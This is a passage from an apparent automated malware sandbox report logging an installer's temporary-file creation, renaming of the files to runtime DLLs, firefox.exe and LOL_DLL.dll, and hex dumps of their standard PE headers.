normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 4AAB52 CreateFileW
File Path Access Attributes Options Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 89 of 149
Old File Path New File Path Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-console-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-datetime-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-debug-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-errorhandling-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l1-2-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l2-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-handle-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-heap-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-interlocked-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-libraryloader-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-localization-l1-2-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-memory-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-namedpipe-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processenvironment-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processthreads-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processthreads-l1-1-1.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-profile-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-rtlsupport-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-string-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-synch-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-synch-l1-2-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-sysinfo-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-timezone-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-util-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-conio-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-convert-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-environment-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-filesystem-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-heap-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-locale-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-math-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-multibyte-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-private-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-process-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-runtime-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-stdio-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
File MovedFile Moved
Copyright Joe Security LLC 2018 Page 90 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-string-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-time-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-utility-l1-1-0.dll
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\dependentlibs.list
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\gaddafi-sarkozy-handshake.jpg
success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\LOL_DLL.dll success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\mozglue.dll success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\msvcp140.dll success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\msvcr110.dll success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\ucrtbase.dll success or wait 1 4AD4FF MoveFileW
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\vcruntime140.dll
success or wait 1 4AD4FF MoveFileW
Old File Path New File Path Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File WrittenFile Written
Copyright Joe Security LLC 2018 Page 91 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp
unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp
unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 92 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp
unknown 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp
unknown 21696 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 93 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 bf 99 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 94 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 95 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp unknown 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp
